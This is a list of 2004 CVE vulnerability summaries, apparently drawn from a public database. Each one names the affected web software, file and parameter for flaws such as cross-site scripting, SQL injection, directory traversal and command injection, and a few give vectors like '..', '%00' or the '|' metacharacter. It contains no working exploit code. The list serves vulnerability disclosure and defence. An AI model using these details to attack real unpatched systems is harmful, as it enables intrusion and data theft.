[CVE-2004-2720] Cross-site scripting (XSS) vulnerability in register.asp in Snitz Forums 2000 3.4.04 and earlier allows remote attackers to inject arbitrary web script or HTML via javascript events in the Email parameter.
[CVE-2004-2702] Cross-site scripting (XSS) vulnerability in login_up.php3 in Plesk 7.0 and 7.1 Reloaded allows remote attackers to inject arbitrary web script or HTML via the login_name parameter. NOTE: this might be the same vector as CVE-2006-6451.
[CVE-2004-2701] Cross-site scripting (XSS) vulnerability in signin.aspx for AspDotNetStorefront 3.3 allows remote attackers to inject arbitrary web script or HTML via the returnurl parameter.
[CVE-2004-2696] BEA WebLogic Server and WebLogic Express 6.1, 7.0, and 8.1, when using Remote Method Invocation (RMI) over Internet Inter-ORB Protocol (IIOP), do not properly handle multiple logins for different users coming from the same client, which could cause an "unexpected user identity" to be used in an RMI call.
[CVE-2004-2688] Cross-site scripting (XSS) vulnerability in index.php in NewsPHP allows remote attackers to inject arbitrary web script or HTML via the cat_id parameter. NOTE: this issue might overlap vector 3 in CVE-2006-3358.
[CVE-2004-2676] The Spy Sweeper Enterprise Client (SpySweeperTray.exe) in WebRoot Spy Sweeper before 2.0 does not drop privileges when using the help functionality, which allows local users to gain privileges.
[CVE-2004-2670] Multiple cross-site scripting (XSS) vulnerabilities in mod.php in eNdonesia 8.3 allow remote attackers to inject arbitrary web script or HTML via (1) the mod parameter in a viewcat operation or (2) the query parameter in a search operation in the publisher module.
[CVE-2004-2667] Cross-site scripting (XSS) vulnerability in Lotus Domino 6.0.x before 6.0.4 and 6.5.x before 6.5.2 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
[CVE-2004-2662] Soft3304 04WebServer before 1.41 allows remote attackers to cause a denial of service (resource consumption or crash) via certain data related to OpenSSL, which causes a thread to terminate but continue to hold resources.
[CVE-2004-2661] Soft3304 04WebServer before 1.41 does not properly check file names, which allows remote attackers to obtain sensitive information (CGI source code).
[CVE-2004-2657] ** DISPUTED ** Mozilla Firefox 1.5.0.1, and possibly other versions, preserves some records of user activity even after uninstalling, which allows local users who share a Windows profile to view the records after a new installation of Firefox, as reported for the list of Passwords Never Saved web sites. NOTE: The vendor has disputed this issue, stating that "The uninstaller is primarily there to uninstall the application. It is not there to uninstall user data. For the moment I will stick by my module-owner decision."
[CVE-2004-2656] Multiple cross-site scripting (XSS) vulnerabilities in Slashdot Like Automated Storytelling Homepage (Slash) (aka Slashcode) before R_2_5_0_41 allow remote attackers to inject arbitrary web script or HTML via (1) the topic parameter in search.pl and (2) the filter parameter in submit.pl.
[CVE-2004-2654] The clientAbortBody function in client_side.c in Squid Web Proxy Cache before 2.6 STABLE6 allows remote attackers to cause a denial of service (segmentation fault) via unspecified vectors that trigger a null dereference. NOTE: in a followup advisory, a researcher claimed that the issue was a buffer overflow that was not fixed in STABLE6. However, the vendor's bug report clearly shows that the researcher later retracted this claim, because the tested product was actually STABLE5.
[CVE-2004-2651] Multiple cross-site scripting (XSS) vulnerabilities in YaCy before 0.32 allow remote attackers to inject arbitrary web script or HTML via the (1) urlmaskfilter parameter to index.html or the (2) page parameter to Wiki.html.
[CVE-2004-2647] Free Web Chat 2.0 allows remote attackers to cause a denial of service (CPU consumption) via multiple connections from the same user.
[CVE-2004-2646] The addUser function in UserManager.java in Free Web Chat 2.0 allows remote attackers to cause a denial of service (uncaught NullPointerException) via unknown attack vectors that cause the usrName variable to be null.
[CVE-2004-2636] TinyWeb 1.9 allows remote attackers to read source code of scripts via "/./" in the URL.
[CVE-2004-2635] An ActiveX control for McAfee Security Installer Control System 4.0.0.81 allows remote attackers to access the Windows registry via web pages that use the control's RegQueryValue() method.
[CVE-2004-2625] Cross-site scripting (XSS) vulnerability in Outblaze Email allows remote attackers to inject arbitrary web script or HTML via Javascript in an attribute of an IMG tag.
[CVE-2004-2624] Cross-site scripting (XSS) vulnerability in "TextSearch" in WackoWiki 3.5 allows remote attackers to inject arbitrary web script or HTML via the "phrase" parameter.
[CVE-2004-2618] Cross-site scripting (XSS) vulnerability in Pegasi Web Server (PWS) 0.2.2 allows remote attackers to inject arbitrary web script or HTML via the URI, directly after the initial '/' (slash).
[CVE-2004-2617] Directory traversal vulnerability in Pegasi Web Server (PWS) 0.2.2 allows remote attackers to read files outside of the web root via a .. (dot dot) directly after the initial '/' (slash) in the URI.
[CVE-2004-2614] Buffer overflow in MyWeb 3.3 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request.
[CVE-2004-2608] SmartWebby Smart Guest Book stores SmartGuestBook.mdb (aka the "news database") under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as the unencrypted username and password of the administrator's account.
[CVE-2004-2604] Cross-site scripting (XSS) vulnerability in index.php in PHProxy allows remote attackers to inject arbitrary web script or HTML via the error parameter.
[CVE-2004-2603] Cross-site scripting (XSS) vulnerability in the Search module in UberTec Help Center Live (HCL) allows remote attackers to inject arbitrary web script or HTML via the find parameter to index.php.
[CVE-2004-2600] The firmware for Intelligent Platform Management Interface (IPMI) 1.5-based Intel Server Boards and Platforms is shipped with an Authentication Type Enables parameter set to an invalid None parameter, which allows remote attackers to obtain sensitive information when LAN management functionality is enabled.
[CVE-2004-2588] Intentional information leak in phpinfo.php in XMB (aka extreme message board) 1.9 beta (aka Nexus beta) allows remote attackers to obtain sensitive information such as the configuration of the web server and the PHP application.
[CVE-2004-2585] Cross-site scripting (XSS) vulnerability in frmCompose.aspx in SmarterTools SmarterMail 1.6.1511 and 1.6.1529 allows remote attackers to inject arbitrary web script or HTML via Javascript to the "check spelling" feature in the compose area.
[CVE-2004-2577] The acl_check function in phpGroupWare 0.9.16RC2 always returns True, even when mkdir does not behave as expected, which could allow remote attackers to obtain sensitive information via WebDAV from users' home directories that lack .htaccess files, and possibly has other unknown impacts.
[CVE-2004-2574] Cross-site scripting (XSS) vulnerability in index.php in phpGroupWare 0.9.14.005 and earlier allows remote attackers to inject arbitrary web script or HTML via the date parameter in a calendar.uicalendar.planner menuaction.
[CVE-2004-2572] AMAX Magic Winmail Server 3.6 allows remote attackers to obtain sensitive information by entering (1) invalid characters such as "()" or (2) a large number of characters in the Lookup field on the netaddressbook.php web form, which reveals the path in an ldaplib.php error message when the ldap_search function fails, due to improper processing of the $keyword variable.
[CVE-2004-2568] Multiple cross-site scripting (XSS) vulnerabilities in ReciPants 1.1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) user id, (2) recipe id, (3) category id, and (4) other ID number fields.
[CVE-2004-2566] Multiple cross-site scripting (XSS) vulnerabilities in LiveWorld products, possibly including (1) LiveForum, (2) LiveQ&A, (3) LiveChat, and (4) LiveFocusGroup, allow remote attackers to inject arbitrary web script or HTML via the q parameter in (a) search.jsp, (b) findclub!execute.jspa, and (c) search!execute.jspa.
[CVE-2004-2564] Multiple cross-site scripting (XSS) vulnerabilities in Sambar Server 6.1 Beta 2 on Windows, and possibly other versions on Linux, allow remote attackers to inject arbitrary web script or HTML via (1) the show parameter in show.asp and (2) the title parameter in showperf.asp.
[CVE-2004-2562] SQL injection vulnerability in jobedit.asp in Leigh Business Enterprises (LBE) Web Helpdesk before 4.0.0.81 allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2004-2561] Multiple SQL injection vulnerabilities in Internet Software Sciences Web+Center 4.0.1 allow remote attackers to execute arbitrary SQL commands via (1) the ISS_TECH_CENTER_LOGIN cookie in search.asp and (2) one or more cookies in DoCustomerOptions.asp.
[CVE-2004-2560] DokuWiki before 2004-10-19, when used on a web server that permits execution based on file extension, allows remote attackers to execute arbitrary code by uploading a file with an appropriate extension such as ".php" or ".cgi".
[CVE-2004-2558] Unspecified vulnerability in IBM Tivoli SecureWay Policy Director 3.8, Access Manager for e-business 3.9 to 5.1, Access Manager Identity Manager Solution 5.1, Configuration Manager 4.2, Configuration Manager for Automated Teller Machines 2.1.0, and IBM WebSphere Everyplace Server, Service Provider Offering for Multi-platforms 2.1.3 to 2.15 allow remote attackers to hijack sessions of authenticated users via unknown attack vectors involving certain cookies, aka "Potential Credential Impersonation Attack."
[CVE-2004-2550] Multiple cross-site scripting (XSS) vulnerabilities in unspecified Perl scripts in SandSurfer before 1.7.1 allow remote attackers to inject arbitrary web script or HTML, which is later executed by a target who views reports containing the injected data.
[CVE-2004-2548] Multiple cross-site scripting (XSS) vulnerabilities in NetWin (1) SurgeMail before 2.0c and (2) WebMail allow remote attackers to inject arbitrary web script or HTML via (a) a URI containing the script, or (b) the username field in the login form. NOTE: it is possible that the first attack vector is resultant from the error message issue (CVE-2004-2547).
[CVE-2004-2547] NetWin (1) SurgeMail before 2.0c and (2) WebMail allow remote attackers to obtain sensitive information via HTTP requests that (a) specify the / URI, (b) specify the /scripts/ URI, or (c) specify a non-existent file, which reveal the path in an error message.
[CVE-2004-2542] Multiple SQL injection vulnerabilities in Dynix (formerly known as epixtech) WebPAC allow remote attackers to execute arbitrary SQL commands via unknown attack vectors, resulting in an ability to execute stored procedures, bypass login authentication, and cause an unspecified denial of service to backend databases.
[CVE-2004-2537] Unspecified vulnerability in SurgeMail before 2.2c10 has unknown impact and attack vectors, related to a "Webmail security bug."
[CVE-2004-2528] Cross-site scripting (XSS) vulnerability in sresult.exe in Webcam Watchdog 4.0.1a allows remote attackers to inject arbitrary web script or HTML via the cam parameter.
[CVE-2004-2525] Cross-site scripting (XSS) vulnerability in compat.php in Serendipity before 0.7.1 allows remote attackers to inject arbitrary web script or HTML via the searchTerm variable.
[CVE-2004-2522] Cross-site scripting (XSS) vulnerability in web.tmpl in Gattaca Server 2003 1.1.10.0 allows remote attackers to inject arbitrary web script or HTML via the (1) template or (2) language parameter.
[CVE-2004-2519] Gattaca Server 2003 1.1.10.0 allows remote attackers to cause a denial of service (CPU consumption) via directory specifiers in the LANGUAGE parameter to (1) index.tmpl and (2) web.tmpl, such as (a) slash "/", (b) backslash "\", (c) dot ".", (d) dot dot "..", and (e) internal slash "lang//en".
[CVE-2004-2518] Gattaca Server 2003 1.1.10.0 allows remote attackers to obtain sensitive information via (1) a trailing null byte ("%00") to a URL or (2) an invalid LANGUAGE parameter to web.tmpl, which reveals the full installation path in an error message.
[CVE-2004-2514] Cross-site scripting (XSS) vulnerability in modules/private_messages/index.php in PowerPortal 1.x allows remote attackers to inject arbitrary web script or HTML via the (1) SUBJECT or (2) MESSAGE field.
[CVE-2004-2512] CRLF injection vulnerability in calendar.php in DCP-Portal 5.3.2 and earlier allows remote attackers to conduct HTTP response splitting attacks to spoof web content and poison web caches via CRLF ("%0d%0a") sequences in the PHPSESSID parameter.
[CVE-2004-2511] Multiple cross-site scripting (XSS) vulnerabilities in DCP-Portal 5.3.2 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the year, (2) month, and (3) day parameters in calendar.php.
[CVE-2004-2510] Cross-site scripting (XSS) vulnerability in showflat.php in Infopop UBB.Threads before 6.5 allows remote attackers to inject arbitrary web script or HTML via the Cat parameter.
[CVE-2004-2509] Cross-site scripting (XSS) vulnerabilities in (1) calendar.php, (2) login.php, and (3) online.php in Infopop UBB.Threads 6.2.3 and 6.5 allow remote attackers to inject arbitrary web script or HTML via the Cat parameter.
[CVE-2004-2508] Cross-site scripting (XSS) vulnerability in main.cgi in Linksys WVC11B Wireless-B Internet Video Camera allows remote attackers to inject arbitrary web script or HTML via the next_file parameter.
[CVE-2004-2506] Unparsed web content delivery vulnerability in WIKINDX before 0.9.9g allows remote attackers to obtain sensitive information via a direct HTTP request to the config.inc file.
[CVE-2004-2503] INweb Mail Server 2.40 allows remote attackers to cause a denial of service (crash) via a large number of connect/disconnect actions to the (1) POP3 and (2) SMTP services.
[CVE-2004-2499] Unspecified vulnerability in Hitachi Web Page Generator and Web Page Generator Enterprise 4.01 and earlier allows remote attackers to cause a denial of service via unknown attack vectors when a web site is "improperly accessed."
[CVE-2004-2498] Unspecified vulnerability in the error handler in Hitachi Web Page Generator and Web Page Generator Enterprise 4.01 and earlier, when using the default error template and debug mode is set to ON, allows remote attackers to determine internal directory structures via unknown attack vectors.
[CVE-2004-2497] Cross-site scripting (XSS) vulnerability in the error handler in Hitachi Web Page Generator and Web Page Generator Enterprise 4.01 and earlier, when using the default error template and debug mode is set to ON, allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
[CVE-2004-2495] The (1) Webmail, (2) admin, and (3) SMTP services in Ability Mail Server 1.18 allow remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous connections to the service.
[CVE-2004-2494] Cross-site scripting (XSS) vulnerability in _error in Ability Mail Server 1.18 allows remote attackers to inject arbitrary web script or HTML via the erromsg parameter.
[CVE-2004-2493] Directory traversal vulnerability in Groupmax World Wide Web (GmaxWWW) 2 and 3, and Desktop 5, 6, and Desktop for Jichitai allows remote authenticated users to read arbitrary .html files via the template name parameter.
[CVE-2004-2492] Cross-site scripting (XSS) vulnerability in Groupmax World Wide Web (GmaxWWW) Desktop 5, 6, and Desktop for Jichitai 6, allows remote attackers to inject arbitrary web script or HTML via the QUERY parameter.
[CVE-2004-2491] A race condition in Opera web browser 7.53 Build 3850 causes Opera to fill in the address bar before the page has been loaded, which allows remote attackers to spoof the URL in the address bar via the window.open and location.replace HTML parameters, which facilitates phishing attacks.
[CVE-2004-2484] Cross-site scripting (XSS) vulnerability in PHP Gift Registry 1.3.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the message parameter to (1) event.php or (2) index.php.
[CVE-2004-2480] Squid Web Proxy Cache 2.3.STABLE5 allows remote attackers to bypass security controls and access arbitrary websites via "@@" sequences in a URL within Internet Explorer.
[CVE-2004-2479] Squid Web Proxy Cache 2.5 might allow remote attackers to obtain sensitive information via URLs containing invalid hostnames that cause DNS operations to fail, which results in references to previously used error messages.
[CVE-2004-2478] Unspecified vulnerability in Jetty HTTP Server, as used in (1) IBM Trading Partner Interchange before 4.2.4, (2) CA Unicenter Web Services Distributed Management (WSDM) before 3.11, and possibly other products, allows remote attackers to read arbitrary files via a .. (dot dot) in the URL.
[CVE-2004-2475] Cross-site scripting (XSS) vulnerability in Google Toolbar 2.0.114.1 allows remote attackers to inject arbitrary web script via about.html in the About section. NOTE: some followup posts suggest that the demonstration code's use of the res:// protocol does not cross privilege boundaries, since it is not allowed in the Internet Zone. Thus this might not be a vulnerability.
[CVE-2004-2468] Cross-site scripting (XSS) vulnerability in SillySearch 2.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2004-2465] Cross-site scripting (XSS) vulnerability in chat.ghp in Easy Chat Server 1.2 allows remote attackers to inject arbitrary web script or HTML via the username parameter.
[CVE-2004-2463] Buffer overflow in ADA Image Server (ImgSvr) 0.4 allows remote attackers to cause a denial of service (web server crash) or execute arbitrary code via a long GET request.
[CVE-2004-2458] Open WebMail 2.30 and earlier, when use_syshomedir is disabled or create_syshomedir is enabled, creates new directories before authenticating, which allows remote attackers to create arbitrary directories.
[CVE-2004-2448] S-Mart Shopping Cart or RediCart 3.9.5b stores smart.cfg under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as the database name.
[CVE-2004-2447] Cross-site scripting (XSS) vulnerability in 1st Class Mail Server 4.01 allows remote attackers to inject arbitrary web script or HTML via the Mailbox parameter to (1) viewmail.tagz, (2) the index script under /user/, (3) members.tagz, (4) general.tagz, (5) advanced.tagz, or (6) list.tagz.
[CVE-2004-2444] Cross-site scripting (XSS) vulnerability in index.php in Jaws 0.3 allows remote attackers to inject arbitrary web script or HTML via the action parameter.
[CVE-2004-2438] Cross-site scripting (XSS) vulnerability in PHP-Fusion 4.01 allows remote attackers to inject arbitrary web script or HTML via the (1) Submit News, (2) Submit Link or (3) Submit Article field.
[CVE-2004-2435] Cross-site scripting (XSS) vulnerability in PeopleSoft Human Resources Management System (HRMS) 7.0, when "web enabled" using HTML Access, allows remote attackers to inject arbitrary web script or HTML via unspecified (1) debugging or (2) utility scripts.
[CVE-2004-2428] Abczone.it WWWguestbook 1.1 stores db/dbase.mdb under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as the plaintext username and password.
[CVE-2004-2424] BEA WebLogic Server and WebLogic Express 8.1 through 8.1 SP2 allow remote attackers to cause a denial of service (network port consumption) via unknown actions in HTTPS sessions, which prevents the server from releasing the network port when the session ends.
[CVE-2004-2423] Unknown vulnerability in the Web calendaring component of Ipswitch IMail Server before 8.13 allows remote attackers to cause a denial of service (crash) via "specific content."
[CVE-2004-2422] Multiple features in Ipswitch IMail Server before 8.13 allow remote attackers to cause a denial of service (crash) via (1) a long sender field to the Queue Manager or (2) a long To field to the Web Messaging component.
[CVE-2004-2402] Cross-site scripting (XSS) vulnerability in YaBB.pl in YaBB 1 GOLD SP 1.3.2 allows remote attackers to inject arbitrary web script or HTML via a hex-encoded to parameter. NOTE: some sources say that the board parameter is affected, but this is incorrect.
[CVE-2004-2401] Stack-based buffer overflow in Ipswitch IMail Express Web Messaging before 8.05 might allow remote attackers to execute arbitrary code via an HTML message with long "tag text."
[CVE-2004-2397] The web-based Management Console in Blue Coat Security Gateway OS 3.0 through 3.1.3.13 and 3.2.1, when importing a private key, stores the key and its passphrase in plaintext in a log file, which allows attackers to steal digital certificates.
[CVE-2004-2385] EMU Webmail 5.2.7 allows remote attackers to obtain sensitive path information (home directory) via an HTTP request for init.emu.
[CVE-2004-2380] Directory traversal vulnerability in postfile.exe for Twilight Utilities Web Server 2.0.0.0 allows remote attackers to write arbitrary files via a .. (dot dot) in the attfile parameter.
[CVE-2004-2379] Multiple cross-site scripting (XSS) vulnerabilities in @Mail 3.64 for Windows allow remote attackers to inject arbitrary web script or HTML via (1) the Displayed Name attribute in util.pl and (2) the Folder attribute in showmail.pl.
[CVE-2004-2376] Buffer overflow in postfile.exe for Twilight Utilities Web Server 2.0.0.0 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a URL request with a long attfile attribute.
[CVE-2004-2371] Multiple Red Storm web-based games, including Ghost Recon 1.4 and earlier, Desert Siege, and The Sum of all Fears 1.1.1.0 and earlier, do not properly check return values from certain functions, which allows remote attackers to cause a denial of service (hang) via packets that contain text strings with incorrect size values.
[CVE-2004-2369] Directory traversal vulnerability in webadmin.nsf for Lotus Domino R6 6.5.1 allows attackers to create and detect directories via a .. (dot dot) in the directory creation command.
[CVE-2004-2358] Cross-site scripting (XSS) vulnerability in admin_words.php for phpBB 2.0.6c allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2004-2356] Early termination vulnerability in Fizmez Web Server 1.0 allows remote attackers to cause a denial of service (crash) by connecting to the server and then disconnecting without sending any data, which triggers a null pointer dereference.
[CVE-2004-2355] Cross-site scripting (XSS) vulnerability in Crafty Syntax Live Help (CSLH) before 2.7.4 allows remote attackers to inject arbitrary web script or HTML via the name field of a livehelp or chat session.
[CVE-2004-2353] BugPort before 1.099 stores its configuration file (conf/config.conf) under the web document root with a file extension that is not normally parsed by web servers, which allows remote attackers to obtain sensitive information.
[CVE-2004-2352] Cross-site scripting (XSS) vulnerability in GBook for PHP-Nuke 1.0 allows remote attackers to inject arbitrary web script or HTML via cookies that are stored in the $_COOKIE PHP variable, which is not cleansed by PHP-Nuke.
[CVE-2004-2351] Cross-site scripting (XSS) vulnerability in GBook for Php-Nuke 1.0 allows remote attackers to inject arbitrary web script or HTML via multiple parameters, including (1) name, (2) email, (3) city, and (4) message, which do not use the <script> and <style> tags, which are filtered by PHP-Nuke.
[CVE-2004-2347] blog.cgi in Leif M. Wright Web Blog 1.1 and 1.1.5 allows remote attackers to execute arbitrary commands via shell metacharacters such as '|' in the file parameter of ViewFile requests.
[CVE-2004-2346] Multiple cross-site scripting (XSS) vulnerabilities in Forum Web Server 1.6 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the Subject field in post1.htm and (2) the File Description field in postfile2.htm.
[CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
[CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
[CVE-2004-2334] Multiple cross-site scripting (XSS) vulnerabilities in EMU Webmail 5.2.7 allow remote attackers to inject arbitrary web script or HTML via (1) a hex-encoded value to the variable parameter in emumail.fcgi, (2) the folder parameter in emumail.fcgi, or Javascript in the (3) username or (4) password field in the login page.
[CVE-2004-2332] Multiple cross-site scripting (XSS) vulnerabilities in CPAN WWW::Form before 1.13 allow remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2004-2327] Vizer Web Server 1.9.1 allows remote attackers to cause a denial of service (crash) via multiple malformed requests including (1) requests without GET, (2) GET requests without HTTP, (3) or long GET requests.
[CVE-2004-2325] Cross-site scripting (XSS) vulnerability in EditModule.aspx for DotNetNuke (formerly IBuySpy Workshop) 1.0.6 through 1.0.10d allows remote attackers to inject arbitrary web script or HTML.
[CVE-2004-2323] DotNetNuke (formerly IBuySpy Workshop) 1.0.6 through 1.0.10d allows remote attackers to obtain sensitive information, including the SQL server username and password, via a GET request for source or configuration files such as Web.config.
[CVE-2004-2322] SQL injection vulnerability in the (1) announce and (2) notes modules of phpWebSite before 0.9.3-2 allows remote attackers to execute arbitrary SQL queries, as demonstrated using the ANN_id parameter to the announce module.
[CVE-2004-2321] BEA WebLogic Server and Express 8.1 SP1 and earlier allows local users in the Operator role to obtain administrator passwords via MBean attributes, including (1) ServerStartMBean.Password and (2) NodeManagerMBean.CertificatePassword.
[CVE-2004-2320] The default configuration of BEA WebLogic Server and Express 8.1 SP2 and earlier, 7.0 SP4 and earlier, 6.1 through SP6, and 5.1 through SP13 responds to the HTTP TRACE request, which can allow remote attackers to steal information using cross-site tracing (XST) attacks in applications that are vulnerable to cross-site scripting.
[CVE-2004-2318] The administrative interface (surgeftpmgr.cgi) for SurgeFTP Server 1.0b through 2.2k1 allows remote attackers to cause a temporary denial of service (crash) via requests with two percent (%) signs in the CMD parameter.
[CVE-2004-2317] Information leak in Mbedthis AppWeb HTTP server 1.0 through 1.1.2 allows remote attackers to obtain sensitive information via a user message that is generated when Mbedthis denies access.
[CVE-2004-2316] Mbedthis AppWeb HTTP server before 1.0.2 allows remote attackers to cause a denial of service (crash) via a GET request containing an MS-DOS device name such as COM1.
[CVE-2004-2315] Mbedthis AppWeb HTTP server before 1.0.2 allows remote attackers to cause a denial of service (crash) via an empty OPTIONS request.
[CVE-2004-2313] Inter7 SqWebMail 3.4.1 through 3.6.1 generates different error messages for incorrect passwords versus correct passwords on non-mail-enabled accounts (such as root), which allows remote attackers to guess the root password via brute force attacks.
[CVE-2004-2311] Directory traversal vulnerability in webadmin.nsf in Lotus Domino R6 6.5.1 allows local users to create folders or determine the existence of files via a .. (dot dot) in the new folder dialog.
[CVE-2004-2310] Cross-site scripting (XSS) vulnerability in webadmin.nsf in Lotus Domino R6 6.5.1 allows remote attackers to inject arbitrary web script or HTML via a Domino command in the Quick Console.
[CVE-2004-2308] Cross-site scripting (XSS) vulnerability in cPanel 9.1.0 and possibly earlier allows remote attackers to inject arbitrary web script or HTML via the dir parameter in dohtaccess.html.
[CVE-2004-2294] Canonicalize-before-filter error in the send_review function in the Reviews module for PHP-Nuke 6.0 to 7.3 allows remote attackers to inject arbitrary web script or HTML via hex-encoded XSS sequences in the text parameter, which is checked for dangerous sequences before it is canonicalized, leading to a cross-site scripting (XSS) vulnerability.
[CVE-2004-2293] Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 6.0 to 7.3 allow remote attackers to inject arbitrary web script or HTML via the (1) eid parameter or (2) query parameter to the Encyclopedia module, (3) preview_review function in the Reviews module as demonstrated by the url, cover, rlanguage, and hits parameters, or (4) savecomment function in the Reviews module, as demonstrated using the uname parameter. NOTE: the Faq/categories and Encyclopedia/ltr issues are already covered by CVE-2005-1023.
[CVE-2004-2288] Cross-site scripting (XSS) vulnerability in index.php in Jelsoft vBulletin allows remote attackers to spoof parts of a website via the loc parameter.
[CVE-2004-2287] Directory traversal vulnerability in explorer.php in DSM Light Web File Browser 2.0 allows remote attackers to read arbitrary files via .. (dot dot) in the wdir parameter.
[CVE-2004-2284] The read_list_from_file function in vacation.pl for OpenWebmail before 2.32 20040629 allows remote attackers to execute arbitrary commands via shell metacharacters in a filename argument.
[CVE-2004-2278] Unknown cross-site scripting (XSS) vulnerability in the web GUI in vHost before 3.10r1 has unknown impact and attack vectors.
[CVE-2004-2267] Cross-site scripting (XSS) vulnerability in Ansel 2.1 and earlier allows remote attackers to inject arbitrary HTML or web script via the album name.
[CVE-2004-2254] SurgeLDAP 1.0g (Build 12), and possibly other versions before 1.0h, allows remote attackers to bypass authentication for the administration interface via a direct request to admin.cgi with a modified utoken parameter.
[CVE-2004-2246] Cross-site scripting (XSS) vulnerability in Goollery before 0.04b allows remote attackers to inject arbitrary HTML or web script via the conversation_id parameter to viewpic.php.
[CVE-2004-2245] Cross-site scripting (XSS) vulnerability in Goollery 0.03 allows remote attackers to inject arbitrary HTML or web script via the (1) page parameter to viewalbum.php or (2) btopage parameter to viewpic.php.
[CVE-2004-2242] Cross-site scripting (XSS) vulnerability in search.php in Phorum, possibly 5.0.7 beta and earlier, allows remote attackers to inject arbitrary HTML or web script via the subject parameter.
[CVE-2004-2241] Cross-site scripting (XSS) vulnerability in Phorum 5.0.11 and earlier allows remote attackers to inject arbitrary HTML or web script via search.php. NOTE: some sources have reported that the affected file is read.php, but this is inconsistent with the vendor's patch.
[CVE-2004-2218] SQL injection vulnerability in pmwh.php in PHPMyWebHosting 0.3.4 and earlier allows remote attackers to modify SQL statements via the password parameter.
[CVE-2004-2216] Unknown vulnerability in Sun Java System Web Server 6.0 SP7 and earlier and 6.1 SP1 and earlier, and Application Server 7 Update 4 and earlier, allows remote attackers to cause a denial of service (crash) via a malformed client certificate.
[CVE-2004-2214] Mbedthis AppWeb HTTP server before 1.1.3 allows remote attackers to bypass access restrictions via a URI with mixed case characters.
[CVE-2004-2213] Mbedthis AppWeb HTTP server before 1.1.3 allows remote attackers to obtain the source code for scripts via a (1) trailing dot (".") or (2) trailing space in an HTTP request.
[CVE-2004-2211] Cross-site scripting (XSS) vulnerability in AliveSites Forums 2.0 allows remote attackers to inject arbitrary web script or HTML via the (1) forum_id, (2) method, or (3) forum_title parameters to post.asp, (4) the forum_title parameter to forum.asp, or (5) the id parameter to post.asp.
[CVE-2004-2210] Multiple cross-site scripting (XSS) vulnerabilities in Express-Web Content Management System (CMS) allow remote attackers to steal cookie-based authentication information and possibly perform other exploits via the (1) n, (2) b, (3) e, or (4) a parameters to default.asp, (5) the Referer header in an HTTP request to login.asp, or (6) the email parameter to subscribe/default.asp.
[CVE-2004-2207] Cross-site scripting (XSS) vulnerability in Ideal Science IdealBB 1.4.9 through 1.5.3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2004-2203] Ansel 1.2 through 2.0 uses insecure default permissions, which allows remote attackers to gain access to web readable directories.
[CVE-2004-2200] Cross-site scripting (XSS) vulnerability in DUware DUforum 3.0 through 3.1 allows remote attackers to inject arbitrary web script or HTML via the message text.
[CVE-2004-2199] Cross-site scripting (XSS) vulnerability in DUware DUclassified 4.0 allows remote attackers to inject arbitrary web script or HTML via the message text.
[CVE-2004-2196] Zanfi CMS lite 1.1 allows remote attackers to obtain the full path of the web server via direct requests without required arguments to (1) adm_pages.php, (2) corr_pages.php, (3) del_block.php, (4) del_page.php, (5) footer.php, (6) home.php, and others.
[CVE-2004-2193] Cross-site scripting (XSS) vulnerability in trade.php for CJOverkill 4.0.3 allows remote attackers to inject arbitrary web script or HTML via the (1) tms[0] or (2) url parameters.
[CVE-2004-2191] Cross-site scripting (XSS) vulnerability in ttt-webmaster.php in Turbo Traffic Trader PHP 1.0 allows remote attackers to inject arbitrary web script or HTML via the (1) msg[0] or (2) siteurl parameters.
[CVE-2004-2188] Cross-site scripting (XSS) vulnerability in DMXReady Site Chassis Manager allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2004-2180] Multiple cross-site scripting (XSS) vulnerabilities in WowBB Forum 1.61 allow remote attackers to inject arbitrary web script or HTML via the (1) country parameter to view_user.php, (2) show parameter to view_forum.php, (3) letter parameter to view_user.php, (4) highlight parameter to view_topic.php, (5) show parameter to index.php, (6) q parameter to search.php, (7) Referer header to admin.php, or the (8) user_email parameter to login.php.
[CVE-2004-2178] SQL injection vulnerability in DevoyBB Web Forum 1.0.0 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
[CVE-2004-2177] Cross-site scripting (XSS) vulnerability in DevoyBB Web Forum 1.0.0 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2004-2171] Cross-site scripting (XSS) vulnerability in Cherokee before 0.4.8 allows remote attackers to inject arbitrary web script or HTML via the URL, which is not properly quoted in the resulting error page.
[CVE-2004-2162] Multiple cross-site scripting (XSS) vulnerabilities in TUTOS 1.1 allow remote attackers to inject arbitrary web script or HTML via (1) the search field of the Address Module or (2) the t parameter to app_new.php.
[CVE-2004-2152] Cross-site scripting (XSS) vulnerability in 'raw' page output mode for MediaWiki 1.3.4 and earlier allows remote attackers to inject arbitrary web script or HTML.
[CVE-2004-2138] Cross-site scripting (XSS) vulnerability in AWSguest.php in AllWebScripts MySQLGuest allows remote attackers to inject arbitrary HTML and PHP code via the (1) Name, (2) Email, (3) Homepage or (4) Comments field.
[CVE-2004-2128] Cross-site scripting (XSS) vulnerability in BRS WebWeaver 1.07 allows remote attackers to execute arbitrary script as other users via the query string to ISAPISkeleton.dll.
